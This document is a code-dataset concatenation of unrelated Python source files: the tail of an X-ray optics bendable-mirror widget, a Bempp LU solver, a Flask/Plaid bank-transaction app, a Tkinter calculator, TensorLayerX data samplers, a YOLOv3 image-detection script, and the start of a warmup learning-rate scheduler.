x_e, y_e, z_e = ShadowPreProcessor.read_surface_error_file(self.ms_defect_file_name)
if len(x) == len(x_e) and len(y) == len(y_e) and \
x[0] == x_e[0] and x[-1] == x_e[-1] and \
y[0] == y_e[0] and y[-1] == y_e[-1]:
z_figure_error = z_e
else:
z_figure_error = interp2d(y_e, x_e, z_e, kind='cubic')(y, x)
z_bender_correction += z_figure_error
self.plot3D(x, y, z_figure_error, 3, "Figure Error Surface")
self.plot3D(x, y, z_bender_correction, 4, "Ideal - Bender + Figure Error Surfaces")
ST.write_shadow_surface(z_bender_correction.T, numpy.round(x, 6), numpy.round(y, 6), self.output_file_name_full)
# Add new surface as figure error
shadow_oe._oe.F_RIPPLE = 1
shadow_oe._oe.F_G_S = 2
shadow_oe._oe.FILE_RIP = bytes(self.output_file_name_full, 'utf-8')
# Redo Raytracing with the new file
super().completeOperations(shadow_oe)
self.send("PreProcessor_Data", ShadowPreProcessorData(error_profile_data_file=self.output_file_name,
error_profile_x_dim=self.dim_x_plus+self.dim_x_minus,
error_profile_y_dim=self.dim_y_plus+self.dim_y_minus))
def instantiateShadowOE(self):
return ShadowOpticalElement.create_ellipsoid_mirror()
def calculate_ideal_surface(self, shadow_oe, sign=-1):
x = numpy.linspace(-self.dim_x_minus, self.dim_x_plus, self.bender_bin_x + 1)
y = numpy.linspace(-self.dim_y_minus, self.dim_y_plus, self.bender_bin_y + 1)
c1 = round(shadow_oe._oe.CCC[0], 10)
c2 = round(shadow_oe._oe.CCC[1], 10)
c3 = round(shadow_oe._oe.CCC[2], 10)
c4 = round(shadow_oe._oe.CCC[3], 10)
c5 = round(shadow_oe._oe.CCC[4], 10)
c6 = round(shadow_oe._oe.CCC[5], 10)
c7 = round(shadow_oe._oe.CCC[6], 10)
c8 = round(shadow_oe._oe.CCC[7], 10)
c9 = round(shadow_oe._oe.CCC[8], 10)
c10 = round(shadow_oe._oe.CCC[9], 10)
xx, yy = numpy.meshgrid(x, y)
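# The ten CCC coefficients define Shadow's general conic surface
# c1*x^2 + c2*y^2 + c3*z^2 + c4*x*y + c5*y*z + c6*x*z + c7*x + c8*y + c9*z + c10 = 0;
# grouping the terms in z gives a quadratic a*z^2 + b*z + c = 0, solved below with the
# quadratic formula (the sign argument selects which of the two sheets is kept).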
c = c1*(xx**2) + c2*(yy**2) + c4*xx*yy + c7*xx + c8*yy + c10
b = c5*yy + c6*xx + c9
a = c3
z = (-b + sign*numpy.sqrt(b**2 - 4*a*c))/(2*a)
z[b**2 - 4*a*c < 0] = numpy.nan
return x, y, z.T
def calculate_bender_correction(self, y, z, kind_of_bender, shape):
b0 = self.dim_x_plus + self.dim_x_minus
L = self.dim_y_plus + self.dim_y_minus # add optimization length
# flip the coordinate system to be consistent with Mike's formulas
ideal_profile = z[0, :][::-1] # one row is the profile of the cylinder, enough for the minimizer
ideal_profile += -ideal_profile[0] + ((L/2 + y)*(ideal_profile[0]-ideal_profile[-1]))/L # Rotation
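# the linear term in the "Rotation" step above levels the two end points of the profile
# (removing the overall tilt) so that the bender fit only has to reproduce the curvature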
if self.which_length == 0:
y_fit = y
ideal_profile_fit = ideal_profile
else:
cursor = numpy.where(numpy.logical_and(y >= -self.optimized_length/2,
y <= self.optimized_length/2) )
y_fit = y[cursor]
ideal_profile_fit = ideal_profile[cursor]
epsilon_minus = 1 - 1e-8
epsilon_plus = 1 + 1e-8
Eh_3 = self.E * self.h ** 3
initial_guess = None
constraints = None
bender_function = None
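# Interpretation (not verified against the original derivation): the closed forms below appear
# to be Euler-Bernoulli beam deflections of a substrate of thickness h and width profile b(y)
# (trapezoidal or rectangular), bent by the end moments M1 and M2 = ratio * M1.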
if shape == TRAPEZIUM:
def general_bender_function(Y, M1, e, ratio):
M2 = M1 * ratio
A = (M1 + M2) / 2
B = (M1 - M2) / L
C = Eh_3 * (2 * b0 + e * b0) / 24
D = Eh_3 * e * b0 / (12 * L)
H = (A * D + B * C) / D ** 2
CDLP = C + D * L / 2
CDLM = C - D * L / 2
F = (H / L) * ((CDLM * numpy.log(CDLM) - CDLP * numpy.log(CDLP)) / D + L)
G = (-H * ((CDLM * numpy.log(CDLM) + CDLP * numpy.log(CDLP))) + (B * L ** 2) / 4) / (2 * D)
CDY = C + D * Y
return H * ((CDY / D) * numpy.log(CDY) - Y) - (B * Y ** 2) / (2 * D) + F * Y + G
def bender_function_2m(Y, M1, e, ratio): return general_bender_function(Y, M1, e, ratio)
def bender_function_1m(Y, M1, e): return general_bender_function(Y, M1, e, 1.0)
if kind_of_bender == SINGLE_MOMENTUM:
bender_function = bender_function_1m
initial_guess = [self.M1, self.e]
constraints = [[self.M1_min if self.M1_fixed == False else (self.M1 * epsilon_minus),
self.e_min if self.e_fixed == False else (self.e * epsilon_minus)],
[self.M1_max if self.M1_fixed == False else (self.M1 * epsilon_plus),
self.e_max if self.e_fixed == False else (self.e * epsilon_plus)]]
elif kind_of_bender == DOUBLE_MOMENTUM:
bender_function = bender_function_2m
initial_guess = [self.M1, self.e, self.ratio]
constraints = [[self.M1_min if self.M1_fixed == False else (self.M1*epsilon_minus),
self.e_min if self.e_fixed == False else (self.e*epsilon_minus),
self.ratio_min if self.ratio_fixed == False else (self.ratio*epsilon_minus)],
[self.M1_max if self.M1_fixed == False else (self.M1*epsilon_plus),
self.e_max if self.e_fixed == False else (self.e*epsilon_plus),
self.ratio_max if self.ratio_fixed == False else (self.ratio*epsilon_plus)]]
elif shape == RECTANGLE:
def general_bender_function(Y, M1, ratio):
M2 = M1 * ratio
A = (M1 + M2) / 2
B = (M1 - M2) / L
C = Eh_3 * b0 / 12
F = (B * L**2) / (24 * C)
G = -(A * L**2) / (8 * C)
return -(B * Y**3) / (6 * C) + (A * Y**2) / (2 * C) + F * Y + G
def bender_function_2m(Y, M1, ratio): return general_bender_function(Y, M1, ratio)
def bender_function_1m(Y, M1): return general_bender_function(Y, M1, 1.0)
if kind_of_bender == SINGLE_MOMENTUM:
bender_function = bender_function_1m
initial_guess = [self.M1]
constraints = [[self.M1_min if self.M1_fixed == False else (self.M1 * epsilon_minus)],
[self.M1_max if self.M1_fixed == False else (self.M1 * epsilon_plus)]]
elif kind_of_bender == DOUBLE_MOMENTUM:
bender_function = bender_function_2m
initial_guess = [self.M1, self.ratio]
constraints = [[self.M1_min if self.M1_fixed == False else (self.M1*epsilon_minus),
self.ratio_min if self.ratio_fixed == False else (self.ratio*epsilon_minus)],
[self.M1_max if self.M1_fixed == False else (self.M1*epsilon_plus),
self.ratio_max if self.ratio_fixed == False else (self.ratio*epsilon_plus)]]
parameters, _ = curve_fit(f=bender_function,
xdata=y_fit,
ydata=ideal_profile_fit,
p0=initial_guess,
bounds=constraints,
method='trf')
if len(parameters) == 1: bender_profile = bender_function(y, parameters[0])
elif len(parameters) == 2: bender_profile = bender_function(y, parameters[0], parameters[1])
else: bender_profile = bender_function(y, parameters[0], parameters[1], parameters[2])
# rotate back to Shadow system
bender_profile = bender_profile[::-1]
ideal_profile = ideal_profile[::-1]
# from here it's Shadow Axis system
correction_profile = ideal_profile - bender_profile
if self.which_length == 1: correction_profile_fit = correction_profile[cursor]
# r-squared = 1 - residual sum of squares / total sum of squares
r_squared = 1 - (numpy.sum(correction_profile**2) / numpy.sum((ideal_profile - numpy.mean(ideal_profile))**2))
rms = round(correction_profile.std()*1e9*self.workspace_units_to_m, 6)
if self.which_length == 1: rms_opt = round(correction_profile_fit.std()*1e9*self.workspace_units_to_m, 6)
self.plot1D(y, bender_profile, y_values_2=ideal_profile, index=0, title = "Bender vs. Ideal Profiles" + "\n" + r'$R^2$ = ' + str(r_squared), um=1)
self.plot1D(y, correction_profile, index=1, title="Correction Profile 1D, r.m.s. = " + str(rms) + " nm" +
("" if self.which_length == 0 else (", " + str(rms_opt) + " nm (optimized)")))
z_bender_correction = numpy.zeros(z.shape)
for i in range(z_bender_correction.shape[0]): z_bender_correction[i, :] = numpy.copy(correction_profile)
return parameters, z_bender_correction
def plot1D(self, x_coords, y_values, y_values_2=None, index=0, title="", um=0):
if self.show_bender_plots == 1:
figure = self.figure_canvas[index].figure
axis = figure.gca()
axis.clear()
axis.set_xlabel("Y [" + self.workspace_units_label + "]")
axis.set_ylabel("Z [" + ("nm" if um==0 else "\u03bcm") + "]")
axis.set_title(title)
axis.plot(x_coords, (y_values * self.workspace_units_to_m * (1e9 if um==0 else 1e6)), color="blue", label="bender", linewidth=2)
if not y_values_2 is None: axis.plot(x_coords, (y_values_2 * self.workspace_units_to_m * (1e9 if um==0 else 1e6)), "-.r", label="ideal")
axis.legend(loc=0, fontsize='small')
figure.canvas.draw()
def plot3D(self, x_coords, y_coords, z_values, index, title=""):
if self.show_bender_plots == 1:
figure = self.figure_canvas[index].figure
x_to_plot, y_to_plot = numpy.meshgrid(x_coords, y_coords)
z_to_plot = z_values.T
axis = figure.gca()
axis.clear()
axis.set_xlabel("X [" + self.workspace_units_label + "]")
axis.set_ylabel("Y [" + self.workspace_units_label + "]")
axis.set_zlabel("Z [nm]")
axis.set_title(title)
axis.plot_surface(x_to_plot, y_to_plot, (z_to_plot * self.workspace_units_to_m * 1e9),
rstride=1, cstride=1, cmap=cm.autumn, linewidth=0.5, antialiased=True)
figure.canvas.draw()
axis.mouse_init()
if __name__ == "__main__":
a = QApplication(sys.argv)
ow = BendableEllipsoidMirror()
ow.show()
a.exec_()
ow.saveSettings()
| StarcoderdataPython |
3364631 | """Bempp direct solver interface."""
# pylint: disable=invalid-name
def compute_lu_factors(A):
"""
Precompute the LU factors of a dense operator A.
This function returns a tuple of LU factors of A.
This tuple can be used in the `lu_factor` attribute
of the lu function so that the LU decomposition is
not recomputed at each call to lu.
"""
from bempp.api import as_matrix
from scipy.linalg import lu_factor
return lu_factor(as_matrix(A.weak_form()))
def lu(A, b, lu_factor=None):
"""Simple direct solver interface.
This function takes an operator and a grid function,
converts the operator into a dense matrix and solves
the system via LU decomposition. The result is again
returned as a grid function.
Parameters
----------
A : bempp.api.BoundaryOperator
The left-hand side boundary operator
b : bempp.api.GridFunction
The right-hand side grid function
    lu_factor : tuple
Optionally pass the tuple (lu, piv)
obtained by the scipy method scipy.linalg.lu_factor
"""
from bempp.api import GridFunction
from scipy.linalg import solve, lu_solve
from bempp.api.assembly.blocked_operator import BlockedOperatorBase
from bempp.api.assembly.blocked_operator import projections_from_grid_functions_list
from bempp.api.assembly.blocked_operator import grid_function_list_from_coefficients
if isinstance(A, BlockedOperatorBase):
vec = projections_from_grid_functions_list(b, A.dual_to_range_spaces)
if lu_factor is not None:
sol = lu_solve(lu_factor, vec)
else:
mat = A.weak_form().A
sol = solve(mat, vec)
return grid_function_list_from_coefficients(sol, A.domain_spaces)
else:
vec = b.projections(A.dual_to_range)
if lu_factor is not None:
sol = lu_solve(lu_factor, vec)
else:
mat = A.weak_form().A
sol = solve(mat, vec)
return GridFunction(A.domain, coefficients=sol)
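# Illustrative usage sketch: `operator`, `rhs_1` and `rhs_2` are placeholders for
# an assembled bempp.api BoundaryOperator and compatible GridFunction right-hand
# sides created elsewhere; only the two helpers defined above are exercised.
#
#   factors = compute_lu_factors(operator)           # factor the dense weak form once
#   sol_1 = lu(operator, rhs_1, lu_factor=factors)   # reuse the factors ...
#   sol_2 = lu(operator, rhs_2, lu_factor=factors)   # ... for several right-hand sides
#   sol_3 = lu(operator, rhs_2)                      # or solve directly, refactoring each time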
| StarcoderdataPython |
3265076 | import datetime
import logging
import os
import dateparser
import pandas as pd
import plaid
from flask import jsonify
from flask import render_template, request, flash
from config.files import files
from self_finance.back_end.data import Data
from self_finance.constants import BankSchema
from self_finance.constants import App
from self_finance.front_end import app
from self_finance.front_end.routes.state import State
from self_finance.front_end.routes.data import update_html_df
from self_finance.front_end.routes.insights import refresh_static_insights
from self_finance.front_end.routes.insights import refresh_dynamic_insights
logger = logging.getLogger(__name__)
class BankState(State):
PLAID_CLIENT_ID = os.environ[App.PLAID_CLIENT_ID_ENV_VAR_KEY]
PLAID_PUBLIC_KEY = os.environ[App.PLAID_PUBLIC_KEY_ENV_VAR_KEY]
PLAID_SECRET = os.environ[App.PLAID_SECRET_ENV_VAR_KEY]
PLAID_ENV = 'development'
PLAID_PRODUCTS = 'transactions'
client = plaid.Client(client_id=PLAID_CLIENT_ID, secret=PLAID_SECRET,
public_key=PLAID_PUBLIC_KEY, environment=PLAID_ENV)
access_token = None
def _standard_render():
return render_template(
'index.html',
plaid_public_key=BankState.PLAID_PUBLIC_KEY,
plaid_environment=BankState.PLAID_ENV,
plaid_products=BankState.PLAID_PRODUCTS
)
@app.route('/')
@app.route('/index')
def index():
return _standard_render()
@app.route('/index/update_transactions', methods=['POST'])
def get_access_token_and_update_transaction_history():
"""
obj: exchange token flow - exchange a Link public_token for an API access_token
"""
if BankState.access_token is None:
public_token = request.form['public_token']
try:
exchange_response = BankState.client.Item.public_token.exchange(public_token)
except plaid.errors.PlaidError as e:
flash(jsonify(format_error(e)), 'warning')
return _standard_render()
BankState.access_token = exchange_response['access_token']
else:
flash('Unable to obtain access token for data.', 'warning')
return _standard_render()
return update_transaction_history()
def update_transaction_history():
mrtd_org = Data.get_most_recent_transaction_date(BankSchema.BANK_TB_NAME, files['base_db'])
mrtd = BankSchema.DATE_FORMAT.format(dateparser.parse(mrtd_org).date()) if mrtd_org else BankSchema.DATE_FORMAT.format(
datetime.date.min)
# update on transactions only following the mrtd
start_date, end_date = mrtd, BankSchema.DATE_FORMAT.format(datetime.datetime.now())
full_df = get_transactions(start_date, end_date)
# TODO - this stuff isn't getting flashed
p1 = 'Successfully updated your bank to the latest transaction history.'
p2 = '\nNo previous data was found in your database so your entire transactions history was applied.'
p3 = f'\nFrom date {str(start_date)} to {str(end_date)}.'
p4 = f'No new transactions have been found.'
try:
if full_df is None or full_df.shape[0] == 0:
flash(p4, 'info')
return _standard_render()
logger.info(f'Merging transactions into {BankSchema.BANK_TB_NAME} database.')
Data.merge(full_df, files['base_db'])
if not mrtd_org:
flash(p1 + p2, 'info')
else:
flash(p1 + p3, 'info')
except Exception as e:
flash(e, 'warning')
# update data-state on /date end
if full_df is not None and full_df.shape[0] > 0:
# note: need to run from `as_html_form_from_sql` because of the
# additional preprocessing that is handled in merge operation
update_html_df()
refresh_static_insights()
refresh_dynamic_insights()
return _standard_render()
def get_transactions(start_date, end_date):
response = BankState.client.Transactions.get(BankState.access_token, start_date=start_date, end_date=end_date)
transactions = response['transactions']
# the transactions in the response are paginated, so make multiple calls while increasing the offset to
# retrieve all transactions
while len(transactions) < response['total_transactions']:
response = BankState.client.Transactions.get(BankState.access_token, start_date=start_date, end_date=end_date,
offset=len(transactions)
)
transactions.extend(response['transactions'])
return pd.DataFrame.from_dict(transactions)
def format_error(e):
return {'error': {'display_message': e.display_message, 'error_code': e.code, 'error_type': e.type,
'error_message': e.message}}
| StarcoderdataPython |
1782916 | <filename>calculator-with-gui/Libraries/NewWindow.py
import tkinter as tk # GUI Library
import os
from PIL import ImageTk # Allows for window icon
from PIL import Image # Allows for window icon
from .Menus import Menu # Program menu
from . import Entry # Calculation entry box
from . import Numbers # Number buttons
from . import Basic # Basic calculator config
# from . import Scientific # Scientific calculator config
class NewWindow(tk.Toplevel):
''' A new calculator GUI window '''
def __init__(self, parent):
tk.Toplevel.__init__(self, parent)
self.parent = parent
self.calculation = tk.StringVar()
self.calculation.trace("w", self.remove_alpha)
self.config_window()
self.add_widgets()
def config_window(self):
''' Set beginning window configurations '''
self.title("Calculator GUI with OOP")
self.geometry("500x300+300+300")
self.minsize(200, 200)
# Add program icon in top left corner
image_path = os.path.relpath(os.path.join("calculator-with-gui", "Libraries", "Assets", "calculator2.png"))
image = ImageTk.PhotoImage(Image.open(image_path))
self.iconphoto(False, image)
def add_widgets(self, symbols="Basic"):
''' Adds and places the widgets into the program window '''
# Add menu
self.option_add('*tearOff', tk.FALSE)
self.menu = Menu.Menubar(self)
self.config(menu=self.menu)
self.bind("<Control-n>", self.menu.filemenu.new_thread)
self.bind("<Control-q>", self.menu.filemenu.exit)
self.bind("<Control-c>", self.menu.editmenu.copy)
self.bind("<Control-x>", self.menu.editmenu.cut)
self.bind("<Control-v>", self.menu.editmenu.paste)
# Initialize and add entry box
self.entry = Entry.Entry(self)
self.entry.grid(column=0, row=0, columnspan=5, sticky="NSEW")
self.entry.height = self.entry.winfo_height()
self.entry.bind("<Configure>", self.entry.resize)
self.bind("<Return>", lambda key: self.handle_key(key.char))
self.bind("<BackSpace>", lambda key: self.handle_key(key.char))
self.bind("<Control-BackSpace>", self.entry.clear)
numbers = ["1", "2", "3", "4", "5", "6", "7", "8", "9", "0"]
symbols = ["+", "-", "*", "/", "(", ")"]
keypad = ["Add", "Subtract", "Multiply", "Divide", "Equal", "Decimal"]
keypad.append("Enter")
chars = numbers + symbols
keypad_keys = numbers + keypad
for char in chars:
self.bind(char, lambda char: self.handle_key(char.char))
for key in keypad_keys:
self.bind("<Key-KP_" + key + ">", lambda key: self.handle_key(key.char))
self.bind("<Key>", lambda key: self.remove_alpha(key.char))
# Initialize and add number buttons
self.numbers = Numbers.Numbers(self)
self.numbers.grid(column=0, row=1, rowspan=4, columnspan=3)
self.numbers.grid_configure(sticky="NSEW")
self.numbers.bind("<Configure>", self.numbers.resize)
# Initialize and add basic symbols
self.symbols = Basic.Basic(self)
self.symbols.grid(column=3, row=1, rowspan=4, sticky="NSEW")
self.symbols.bind("<Configure>", self.symbols.resize)
self.rowconfigure(0, weight=1)
self.rowconfigure(1, weight=3)
self.columnconfigure(0, weight=2)
self.columnconfigure(3, weight=1)
def handle_key(self, key):
if key == "=" or key == "\r": # Enter key
self.entry.calculate()
elif str(self.focus_get()) != ".!entry.!entry":
if key == "\x08": # Backspace key
self.entry.delete()
elif key == "=" or key == "\r": # Enter key
self.entry.calculate()
else:
self.entry.insert(key)
else:
current = self.calculation.get() + key
if "".join(current.split(key)) == "".join("Error".split(key)):
self.calculation.set("")
self.entry.insert(key)
def remove_alpha(self, char):
if char.isalpha():
current = self.calculation.get()
self.calculation.set(current.replace(char, ""))
| StarcoderdataPython |
4838212 | <gh_stars>10-100
#! /usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
__all__ = [
'Sampler',
'BatchSampler',
'RandomSampler',
'SequentialSampler',
'WeightedRandomSampler',
'SubsetRandomSampler',
]
class Sampler(object):
"""Base class for all Samplers.
All subclasses should implement following methods:
:code:`__iter__`: providing a way to iterate over indices of dataset element
:code:`__len__`: the length of the returned iterators.
Examples
--------
With TensorLayerx
>>> from tensorlayerx.dataflow import Sampler
>>> class MySampler(Sampler):
>>> def __init__(self, data):
>>> self.data = data
>>> def __iter__(self):
>>> return iter(range(len(self.data_source)))
>>> def __len__(self):
>>> return len(self.data)
"""
def __init__(self):
pass
def __iter__(self):
raise NotImplementedError
class BatchSampler(Sampler):
"""Wraps another sampler to yield a mini-batch of indices.
Parameters
----------
sampler : Sampler
Base sampler.
batch_size : int
Size of mini-batch
drop_last : bool
If ``True``, the sampler will drop the last batch if its size would be less than ``batch_size``
Examples
--------
With TensorLayerx
>>> from tensorlayerx.dataflow import BatchSampler, SequentialSampler
>>> list(BatchSampler(SequentialSampler(range(10)), batch_size=3, drop_last=False))
>>> #[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
>>> list(BatchSampler(SequentialSampler(range(10)), batch_size=3, drop_last=True))
>>> #[[0, 1, 2], [3, 4, 5], [6, 7, 8]]
"""
def __init__(self, sampler=None, batch_size=1, drop_last=False):
super(BatchSampler, self).__init__()
if not isinstance(batch_size, int) or batch_size <= 0:
raise ValueError("batch_size should be a positive integer value, but got {}.".format(type(batch_size)))
if not isinstance(drop_last, bool):
raise ValueError("drop_last should be a bool value, but got {}.".format(type(drop_last)))
self.sampler = sampler
self.batch_size = batch_size
self.drop_last = drop_last
def __iter__(self):
batch_idxs = []
for index in self.sampler:
batch_idxs.append(index)
if len(batch_idxs) == self.batch_size:
yield batch_idxs
batch_idxs = []
if len(batch_idxs) > 0 and not self.drop_last:
yield batch_idxs
def __len__(self):
num_samples = len(self.sampler)
if self.drop_last:
return num_samples // self.batch_size
else:
return (num_samples + self.batch_size - 1) // self.batch_size
class RandomSampler(Sampler):
"""Samples elements randomly. If without replacement, then sample from a shuffled dataset.
    If with replacement, then the user can specify `num_samples` to draw.
Parameters
-------------
data : Dataset
dataset to sample
replacement : bool
samples are drawn on-demand with replacement if ``True``, default=``False``
num_samples : int
number of samples to draw, default=`len(dataset)`. This argument is supposed to be specified only when `replacement` is ``True``.
generator : Generator
Generator used in sampling. Default is None.
Examples
--------
With TensorLayerx
>>> from tensorlayerx.dataflow import RandomSampler, Dataset
>>> import numpy as np
>>> class mydataset(Dataset):
>>> def __init__(self):
>>> self.data = [np.random.random((224,224,3)) for i in range(100)]
>>> self.label = [np.random.randint(1, 10, (1,)) for i in range(100)]
>>> def __getitem__(self, item):
>>> x = self.data[item]
>>> y = self.label[item]
>>> return x, y
>>> def __len__(self):
>>> return len(self.data)
>>> sampler = RandomSampler(data = mydataset())
"""
def __init__(self, data, replacement=False, num_samples=None, generator=None):
super(RandomSampler, self).__init__()
self.data = data
self.replacement = replacement
self._num_samples = num_samples
self.generator = generator
if not isinstance(self.replacement, bool):
raise TypeError("replacement should be a boolean value, but got " "replacement={}".format(self.replacement))
if self._num_samples is not None and not replacement:
raise ValueError("When replacement is False, num_samples should not be specified.")
if not isinstance(self.num_samples, int) or self.num_samples <= 0:
raise ValueError(
"num_samples should be a positive integer, "
"but got num_samples={}".format(self.num_samples)
)
@property
def num_samples(self):
if self._num_samples is None:
return len(self.data)
return self._num_samples
def __iter__(self):
n = len(self.data)
if self.generator is None:
generator = np.random.default_rng()
if self.replacement:
for index in generator.choice(np.arange(n), self.num_samples, replace=True).tolist():
yield index
else:
for index in generator.choice(np.arange(n), n, replace=False).tolist():
yield index
else:
for i in range(self.num_samples):
try:
index = next(self.generator)
except StopIteration:
return
yield index
def __len__(self):
return self.num_samples
class SequentialSampler(Sampler):
"""Samples elements sequentially, always in the same order.
Parameters
----------
data : Dataset
dataset to sample
Examples
--------
With TensorLayerx
>>> from tensorlayerx.dataflow import SequentialSampler, Dataset
>>> import numpy as np
>>> class mydataset(Dataset):
>>> def __init__(self):
>>> self.data = [np.random.random((224,224,3)) for i in range(100)]
>>> self.label = [np.random.randint(1, 10, (1,)) for i in range(100)]
>>> def __getitem__(self, item):
>>> x = self.data[item]
>>> y = self.label[item]
>>> return x, y
>>> def __len__(self):
>>> return len(self.data)
>>> sampler = SequentialSampler(data = mydataset())
"""
def __init__(self, data):
super(SequentialSampler, self).__init__()
self.data = data
def __iter__(self):
return iter(range(len(self.data)))
def __len__(self):
return len(self.data)
class WeightedRandomSampler(Sampler):
"""Samples elements from ``[0,..,len(weights)-1]`` with given probabilities (weights).
Parameters
-----------
weights : list or tuple
a sequence of weights, not necessary summing up to one
num_samples : int
number of samples to draw
replacement : bool
if ``True``, samples are drawn with replacement.
If not, they are drawn without replacement, which means that when a sample index is drawn for a row, it cannot be drawn again for that row.
Examples
--------
With TensorLayerx
>>> from tensorlayerx.dataflow import WeightedRandomSampler, Dataset
>>> import numpy as np
>>> sampler = list(WeightedRandomSampler(weights=[0.2,0.3,0.4,0.5,4.0], num_samples=5, replacement=True))
>>> #[4, 4, 1, 4, 4]
>>> sampler = list(WeightedRandomSampler(weights=[0.2,0.3,0.4,0.5,0.6], num_samples=5, replacement=False))
>>> #[4, 1, 3, 0, 2]
"""
def __init__(self, weights, num_samples, replacement=True):
super(WeightedRandomSampler, self).__init__()
if not isinstance(weights, (list, tuple, np.ndarray)):
raise ValueError("weights should be a list, tuple or numpy.ndarray, but got {}.".format(type(weights)))
        weights = np.asarray(weights, dtype=np.float64)  # the np.float alias was removed in newer NumPy
assert len(weights.shape) == 1, "weights should be a 1-D array"
if np.any(weights < 0.0):
raise ValueError("weights should be positive value.")
if not np.sum(weights) > 0.0:
raise ValueError("The sum of weights should be a positive value.")
if not replacement:
if np.sum(weights > 0.0) < num_samples:
raise ValueError(
"when replacement is False, the number of positive values in weights should be greater than numsamples."
)
self.weights = weights / weights.sum()
self.num_samples = num_samples
self.replacement = replacement
def __iter__(self):
index = np.random.choice(len(self.weights), self.num_samples, self.replacement, self.weights)
return iter(index.tolist())
def __len__(self):
return self.num_samples
class SubsetRandomSampler(Sampler):
"""Samples elements randomly from a given list of indices, without replacement.
Parameters
----------
indices : list or tuple
sequence of indices
"""
def __init__(self, indices):
super(SubsetRandomSampler, self).__init__()
self.indices = indices
def __iter__(self):
return (self.indices[i] for i in np.random.permutation(len(self.indices)))
def __len__(self):
return len(self.indices)
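if __name__ == "__main__":
    # Minimal usage sketch: draw batches of indices from a toy 10-element dataset
    # with the samplers defined above (the data values themselves are arbitrary).
    toy_data = list(range(10))
    sequential_batches = list(BatchSampler(SequentialSampler(toy_data), batch_size=3, drop_last=False))
    print(sequential_batches)  # [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
    random_batches = list(BatchSampler(RandomSampler(toy_data), batch_size=3, drop_last=True))
    print(random_batches)  # three batches of 3 shuffled indices; the incomplete batch is dropped
    weighted_indices = list(WeightedRandomSampler(weights=[0.1, 0.1, 0.8], num_samples=5, replacement=True))
    print(weighted_indices)  # indices drawn in proportion to the weights, mostly index 2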
| StarcoderdataPython |
3267423 | import cv2
import os
from matplotlib import pyplot as plt
from model import *
from utils import *
import os
import time
import logging
import argparse
import numpy as np
import random
from numpy import expand_dims
from keras.preprocessing.image import load_img, img_to_array
import tensorflow as tf
def main():
parser = argparse.ArgumentParser()
    parser.add_argument('--class_threshold', type=float, default=0.5)
    parser.add_argument('--nms_iou_threshold', type=float, default=0.5)
parser.add_argument('--iou', type=float, default=0.01)
args = parser.parse_args()
model = make_yolov3_model()
# load the model weights
weight_reader = WeightReader('yolov3.weights')
# set the model weights into the model
weight_reader.load_weights(model)
# save the model to file
model.save('model.h5')
from keras.models import load_model
model = load_model('model.h5')
model.summary()
anchors = [[116,90, 156,198, 373,326], [30,61, 62,45, 59,119], [10,13, 16,30, 33,23]]
# define the expected input shape for the model
WIDTH, HEIGHT = 416, 416
# define the probability threshold for detected objects
class_threshold = args.class_threshold
images=os.listdir('assets/image_test')
for file in images:
if file.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')):
            photo_filename = os.path.join('assets/image_test', file)
# load picture with old dimensions
image, image_w, image_h = load_image_pixels(photo_filename, (WIDTH, HEIGHT))
# Predict image
yhat = model.predict(image)
#print(len(yhat))
# Create boxes
boxes = list()
for i in range(len(yhat)):
# decode the output of the network
boxes += decode_netout(yhat[i][0], anchors[i], class_threshold, HEIGHT, WIDTH)
# correct the sizes of the bounding boxes for the shape of the image
correct_yolo_boxes(boxes, image_h, image_w, HEIGHT, WIDTH)
# suppress non-maximal boxes
do_nms(boxes, args.nms_iou_threshold)
# define the labels (Filtered only the ones relevant for this task, which were used in pretraining the YOLOv3 model)
labels = ["person", "bicycle", "car", "motorbike", "aeroplane", "bus", "train", "truck","boat","traffic light", \
"fire hydrant","stop sign","parking meter","bench","bird","cat","dog","horse","sheep", \
"cow","elephant","bear","zebra","giraffe","backpack","umbrella","handbag","tie","suitcase", \
"frisbee","skis","snowboard","sports ball","kite",'baseball bat','baseball glove','skateboard','surfboard','tennis racket','bottle', \
'wine glass','cup','fork','knife','spoon','bowl','banana','apple','sandwich','orange','broccoli', \
'carrot','hot dog','pizza','donut','cake','chair','sofa','pottedplant','bed','diningtable', \
'toilet','tvmonitor','laptop','mouse','remote','keyboard','cell phone','microwave','oven','toaster','sink','refrigerator', \
'book',"clock","vase","scissors","teddy bear",'hair drier',"toothbrush"]
# get the details of the detected objects
v_boxes, v_labels, v_scores = get_boxes(boxes, labels, class_threshold)
# summarize what we found
for i in range(len(v_boxes)):
print(v_labels[i], v_scores[i])
# draw what we found
draw_boxes(photo_filename, v_boxes, v_labels, v_scores)
if __name__ == '__main__':
main() | StarcoderdataPython |
3349084 | <filename>python_developer_tools/cv/scheduler/warmup_lr_scheduler.py
# !/usr/bin/env python
# -- coding: utf-8 --
# @Author zengxiaohui
# Datatime:8/18/2021 9:19 AM
# @File:warmup_lr_scheduler.py
import math
import warnings
from functools import partial, wraps
from bisect import bisect_right
from torch.optim import Optimizer
from torch.optim.lr_scheduler import _LRScheduler, MultiStepLR, StepLR, ExponentialLR, CosineAnnealingLR
def AssemblyParams(f):
@wraps(f)
def info(*args, **kwargs):
name = kwargs['name'] # 下降方式
iters = kwargs['iters'] # 开始下降的位置
factor = kwargs['factor'] # 每次下降的大小
assert isinstance(name, str), 'name must be str type'
assert name, 'name must in ["linear","exponent","sine"]'
assert isinstance(iters, int), 'iters must be int type'
assert isinstance(factor, float), 'factor must be float type'
args[0].warmup_method = name
args[0].warmup_iters = iters
args[0].warmup_factor = factor
f(*args, **kwargs)
return info
class _WarmupLRScheduler(_LRScheduler):
# @AssemblyParams
def __init__(self, optimizer, last_epoch=-1, name=None,iters=None,factor=None):
super(_WarmupLRScheduler, self).__init__(optimizer, last_epoch)
def step(self, epoch=None):
# Raise a warning if old pattern is detected
# https://github.com/pytorch/pytorch/issues/20124
if self._step_count == 1:
if not hasattr(self.optimizer.step, "_with_counter"):
warnings.warn("Seems like `optimizer.step()` has been overridden after learning rate scheduler "
"initialization. Please, make sure to call `optimizer.step()` before "
"`lr_scheduler.step()`. See more details at "
"https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate", UserWarning)
# Just check if there were two first lr_scheduler.step() calls before optimizer.step()
elif self.optimizer._step_count < 1:
warnings.warn("Detected call of `lr_scheduler.step()` before `optimizer.step()`. "
"In PyTorch 1.1.0 and later, you should call them in the opposite order: "
"`optimizer.step()` before `lr_scheduler.step()`. Failure to do this "
